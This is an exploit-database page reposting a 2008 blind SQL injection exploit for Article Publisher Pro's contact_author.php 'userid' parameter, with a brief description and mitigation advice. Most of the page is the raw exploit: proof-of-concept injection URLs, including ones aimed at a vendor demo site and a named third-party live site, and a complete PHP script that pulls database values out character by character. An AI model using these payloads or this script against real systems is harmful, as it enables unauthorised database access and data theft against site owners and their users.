header-logo
Suggest Exploit
vendor:
Article Publisher Pro
by:
Mountassif Moad
7.5
CVSS
HIGH
Blind Sql Injection
89
CWE
Product Name: Article Publisher Pro
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Article Publisher Pro – Blind SQL Injection Exploit

Article Publisher Pro is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'userid' parameter of the 'contact_author.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL statements to the vulnerable script. This can allow the attacker to gain access to the database and extract sensitive information.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

###########################################################################
# Kira has decide be back after halloween
###########################################################################
# Discovered by : Mountassif Moad
# Type Gap : Blind Sql Injection
# Script : Article Publisher Pro : http://www.phparticlescript.com/
# Greetz : Allah , All my freind
##########################################################################

P0c :

http://localhost/contact_author.php?userid=1+and+1=1   true

http://localhost/contact_author.php?userid=1+and+1=0   false

http://demo-article-publisher-pro.phparticlescript.com/contact_author.php?userid=1+and+1=1   true

http://demo-article-publisher-pro.phparticlescript.com/contact_author.php?userid=1+and+1=0   false

Exploit :

http://localhost/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=4   true

http://localhost/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=5   false

Demo Test :

http://fashiongumbo.com/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=4  true

http://fashiongumbo.com/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=5  false

code Exploit :

<?php
ini_set("max_execution_time",0);
print_r('
###############################################################
#
#      Article Publisher Pro - Blind SQL Injection Exploit    
#
###############################################################
#                                                            
#      Dork:        N/A
#      Usage:       php '.$argv[0].' [Target] [data]
#      Live Demo :
#      =>php '.$argv[0].' http://localhost/contact_author.php?userid=1 user()
#                                                            
###############################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."'+and+1=0"));
$t = abs((100-($w/$r*100)));
echo "\n".$argv[2].": ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((".$argv[2]."),".$i.",1))!=0"));
   if (abs((100-($laenge/$r*100))) > $t-1) {
      $count = $i;
      $i = 30;
   }
}
for ($j = 1; $j < $count; $j++) {
   for ($i = 46; $i <= 122; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((".$argv[2]."),".$j.",1))%3E".$i.""));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((".$argv[2]."),".$j.",1))%3E".($i-1).""));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 122;
      }
   }
}

} else {
echo "\nExploiting failed: ar u sur your link have a real id user \n";
}
?>

# milw0rm.com [2008-10-31]

Navigation

Suggest Exploit

Services By CQR